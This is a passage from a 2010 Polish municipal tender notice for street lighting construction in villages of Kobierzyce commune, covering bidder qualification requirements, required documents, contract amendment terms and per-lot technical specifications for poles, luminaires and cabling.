<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 2 ustawy Pzp, jeżeli wykonał w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 1 zamówienie polegające na budowie lub przebudowie oświetlenia dróg lub placów lub parków, o długości linii kablowej co najmniej 2.000 m, potwierdzone dokumentem stwierdzającym, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, (za każde zamówienie zgodne z warunkami Zamawiającego Wykonawca otrzyma 1 pkt.);
 
Zamawiający, na podstawie złożonego przez Wykonawcę /wykazu robót budowlanych w zakresie niezbęd-nym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (do wypełnienia formularz wg. wzoru Zamawiającego) - załącznik nr 6/, dokona oceny spełniania w/w warunku według formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 3 ustawy Pzp, jeżeli dysponuje co najmniej:
- 1 osobą (kierownik budowy)  z uprawnieniami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
odnośnie w/w uprawnień, Zamawiający dopuszcza ważne uprawnienia budowlane - wydane na podstawie uprzednio obowiązujących przepisów, odpowiednio w zakresie niezbędnym do wykonania przedmiotu niniejszego zamówienia.

Zamawiający, na podstawie złożonego przez Wykonawcę /wykazu osób, które będą uczestniczyć w wykony-waniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbęd-nych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz infor-macją o podstawie do dysponowania tymi osobami -- (do wypełnienia formularz wg. wzoru Zamawiającego) - załącznik nr 7/

a także:

/oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia 
posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowią-zek posiadania takich uprawnień (do wypełnienia formularz wg. wzoru Zamawiającego) - załącznik nr 8/

dokona oceny spełniania w/w warunku według formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 4 ustawy Pzp, jeżeli posiada: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 400.000 zł.

Zamawiający, na podstawie złożonej przez Wykonawcę /opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 400.000 zł - załącznik nr 9/
dokona oceny spełniania w/w warunku według formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>10) dowód wpłaty wadium w wys. 6.000 zł (zadanie 1), 5.900 zł - (zadanie 2), 7.000 zł (zadanie 3) (przy składaniu ofert) - załącznik nr 10.

11) wykaz sprzętu i materiałów z cenami (przy składaniu ofert. Wykonawca tworzy wykaz.) - załącznik nr 11.

12) wykaz materiałów i urządzeń równoważnych wraz z danymi technicznymi wykazującymi ich parametry, ewentualnie odpowiednie obliczenia - załącznik nr 12 (Wykonawca przedstawiający ofertę równoważną składa przy złożeniu oferty. Wykonawca tworzy wykaz).

13)  formularz podwykonawców - (w przypadku korzystania z podwykonawców należy wskazać zakres rzeczowy przewidziany do realizacji przez podwykonawcę, jeśli nie dotyczy należy wpisać /nie dotyczy/ - załącznik nr 13 (do wypełnienia formularz wg. wzoru Zamawiającego - przy składaniu oferty).

14) pisemne zobowiązanie, jeżeli Wykonawca polega na zasobach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy Pzp - załącznik nr 14

15) opisy - karty katalogowe, wizaulizacje oferowanych opraw oświetleniowych, deklaracje zgodności producenta - załączniki nr 15  (Każdy Wykonawca składa przy złożeniu oferty).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu (określone w pkt VIII będzie mniejsza niż 10, to wynikiem oceny będzie zaproszenie przez Zamawiającego wszystkich Wykonawców, którzy złożyli wnioski i spełniają minimalny poziom wymaganych standardów określonych warunkami udziału w postępowaniu.

Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu (określone w pkt. VIII będzie wyższa niż 10 (dziesięć) , to Zamawiający zaprosi do składania ofert tylko tych Wykonawców, którzy otrzymają najwyższe oceny spełniania warunków według poniższej zasady:
1) za każdą należycie wykonaną robotę budowlaną polegającą na  na budowie lub przebudowie oświetlenia dróg lub placów lub parków, o długości linii kablowej co najmniej 2.000 m, Wykonawca otrzyma jeden punkt (1 pkt.) - znaczenie (waga) - 100%.

 Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu (określone w pkt VIII będzie wyższa niż 10 (dziesięć) -  i jednocześnie, jeżeli Wykonawcy uzyskają tą samą ilość punktów, to o miejscu w rankingu decyduje sumaryczna wartość wykonanych robót dotyczących oświetlenia dróg lub placów lub parków, o długości linii kablowej co najmniej 2.000 m.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych (t.j. DZ. U. z 2007 r. Nr 223 poz. 1655 ze zm.) przewidział możliwość dokonania zmiany umowy w formie aneksu pod następującymi warunkami:
1) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku :
- wprowadzenia zmian w dokumentacji techniczno - projektowej co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy; 
-  przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;
 -  powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich powierzenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
- pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
- konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów;
-  wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy.
2) zmiany dokonane według zasad zapisanych w umowie;
3) zmiana dokonana na podstawie art. 23 pkt 1 ustawy Prawo budowlane zmiana w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
4) zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. a) ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;
5) zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 ustawy Prawo budowlane i dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;
6) zmiana ceny przy zaistnieniu zmian stawek podatkowych lub stawek celnych (znaczący wzrost cen czynników niezależnych od Wykonawcy).
7) zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych; 
8) zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
9)  zmiana osób odpowiedzialnych za kontakty  i nadzór nad przedmiotem umowy; 
10) zmiana formy zabezpieczenia należytego wykonania umowy.
11) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce Al. Pałacowa 1,  55-040 Kobierzyce pok. 51.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 13:00, miejsce: Urząd Gminy Kobierzyce  55-040 Kobierzyce Al. Pałacowa 1 pok. 25 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Strony w toku postępowania porozumiewają się na piśmie, faxem, e-mailem. 
Oświadczenia, dokumenty, wnioski, pytania oraz inne informacje przekazane faksem, e-mailem uważać się będzie za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona przez drugą Stronę (na żądanie).
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
Wniosek/Oferta przedstawiona przez 2 lub więcej Wykonawców (Partnerów) wchodzących  w skład konsorcjum lub spółki cywilnej musi zostać przedstawiona jako jednen wniosek/oferta i spełniać poniższe wymagania:
1) partnerzy na podstawie art. 23 ustawy Pzp muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie przedmiotowego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego. Umocowanie winno zostać załączone do wniosku - treść pełnomocnictwa musi dokładnie określać zakres umocowania;
2) każdy z partnerów oddzielnie musi przedstawić dokumenty wymienione w pkt. IX. jako załączniki do wniosku nr 1,2,3,4;
3) dokumenty wymienione w pkt. IX. jako załączniki do wniosku nr 5,6,7,8,9 powinny potwierdzać wspólne (łączne) spełnienie przez partnerów konsorcjum wymagań oraz warunków udziału w postępowaniu - w tym przypadku dokumenty przedstawia jeden lub kilku partnerów konsorcjum;
4) wniosek i oferta musi być podpisana  tak, aby prawnie zobowiązywała wszystkich partnerów konsorcjum;
5) korespondencja a także rozliczanie będzie miało miejsce wyłącznie z pełnomocnikiem (liderem) konsorcjum;
6) przy wypełnianiu formularza wniosku/oferty, jak również innych dokumentów - w miejscu /adres Wykonawcy/, /podpis Wykonawcy/ należy wpisać dane dotyczące wszystkich członków konsorcjum, a nie zaś ich pełnomocnika (lidera) czy jednego z członków konsorcjum;
7) podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.
8) Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy konsorcjum.

Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej obowiązują przepisy określone w § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. /w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane/ (Dz.U. z 2009 Nr 226, poz. 1817).
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Zamawiający wymaga, aby dokumenty były przedstawione w formie oryginału lub kopii poświadczonych /za zgodność z oryginałem/ przez Wykonawcę lub osoby upoważnione do reprezentowania Wykonawcy.
Uznaje się, że pełnomocnictwo do podpisania i złożenia wniosku/oferty oraz wszelkich wymaganych w SIWZ oświadczeń obejmuje w swoim zakresie pełnomocnictwo do poświadczenia za zgodność z oryginałem dokumentów i oświadczeń załączonych do wniosku/oferty
Formularz oferty i załączniki muszą być podpisane przez umocowanego przedstawiciela lub przedstawicieli Wykonawcy, upoważnionego do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym lub udzielonym pełnomocnictwem. Pełnomocnictwo winno być dołączone do wniosku i oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 
     Jeśli pełnomocnictwo dołączone jest w formie kserokopii powinno być potwierdzone notarialnie. Kopie dokumentów innych niż pełnomocnictwo muszą być podpisane /za zgodność z oryginałem/ przez Wykonawcę lub jego pełnomocnika i zawierać datę poświadczenia.
Wykonawca  winien zamieścić wniosek, dokumenty i załączniki w kopercie / opakowaniu. Kopertę należy zaadresować oraz opisać:

Wniosek o dopuszczenie do udziału w postępowaniu w trybie przetargu ograniczonego na realizację zadania: 
/Budowa oświetlenia drogowego w wybranych miejscowościach gminy Kobierzyce, na podstawie dokumentacji projektowo-technicznych.
Nie otwierać przed 09.07.2010 r. przed godz. 13.15/
Poza oznaczeniami podanymi powyżej, na odwrocie koperty należy podać nazwę  i adres Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 (część 1)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Ślęza ul. Przystankowa, Rekreacyjna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa np. typu ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła  np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 788 m.
Ilość opraw 24 sztuk.
Ilość latarni 24 sztuk.

b. Ślęza ul. Pszenna, w m. Wysoka ul. Radosna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Oświetlenia zamieszczonego na rys. 3 i 4 w Projekcie budowlanym nie wykonywać.
Długość linii kablowej ok. 950 m.
Ilość opraw 22 sztuk.
Ilość latarni 22 sztuk.

c. Ślęza - ul. Pszenna, Rzeczna 
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa np. typu ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła  np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 539 m.
Ilość opraw 15 sztuk.
Ilość latarni 15 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.14.00-9, 45.31.61.10-9, 45.23.20.00-2, 45.31.43.00-4, 45.23.31.42-6, 45.11.27.10-5, 45.31.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 (część 2)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Wysoka - ul. Irysowa, Sezamkowa, Cisowa, Jaworowa, Działkowa, Wiosenna. 
Oświetlana ulica wymaga oświetlenia klasy ME 6. Oświetlenie odcinka ulicy w oparciu o słupy aluminiowe, malowane o wysokości 4,2 m typu np. INOA. Oprawy sodowe, energooszczędne typu np. INOA. Latarnie wyposażone fabrycznie w tabliczki bezpiecznikowe. Każdą oprawę zasilić przewodem YDY 3x 4,0 mm2/750V.
Długość linii kablowej ok. 1970 m.
Ilość opraw 81 sztuk.
Ilość latarni 81 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.14.00-9, 45.31.61.10-9, 45.23.20.00-2, 45.31.43.00-4, 45.23.31.42-6, 45.11.27.10-5, 45.31.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 (część 3)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Tyniec n/Ślęzą ul. Polna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 4,5 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa 4,5 m typu np. AURIGA firmy Valmont. Zastosować oprawy sodowe, energooszczędne. Oprawy w standardzie opraw firmy np. THORN typu NELLA 70 W HID 2,5 KV SIL. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 462 m.
Ilość opraw 17 sztuk.
Ilość latarni 17 sztuk.

b) Bąki ul. Spacerowa
Oświetlana ulica wymaga oświetlenia klasy ME 6. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnika 0,5 m firmy np. Valmont. Zastosować oprawy sodowe, energooszczędne.  Oprawy w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN . Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu TBO-35 produkcji WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok.  703 m.
Ilość opraw 20 sztuk.
Ilość latarni 20 sztuk.

c) Pustków Żurawski ul. Kolejowa
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnikiem 1 m firmy np. Valmont. Oprawy w standardzie opraw firmy np. THORN typu np.  TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN.
Długość linii kablowej ok.  796 m.
Ilość opraw 22 sztuk.
Ilość latarni 22 sztuk.

d) Jaszowice ul. Słoneczna.
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie ulicy w oparciu o słupy stalowe ocynkowane o wysokości 6 m bez wysięgnika. Dobór słupa w oparciu o obliczenia dla słupa AURIGA P 60 6 m firmy Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np.  TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 458 m.
Ilość opraw 16 sztuk.
Ilość latarni 16 sztuk.

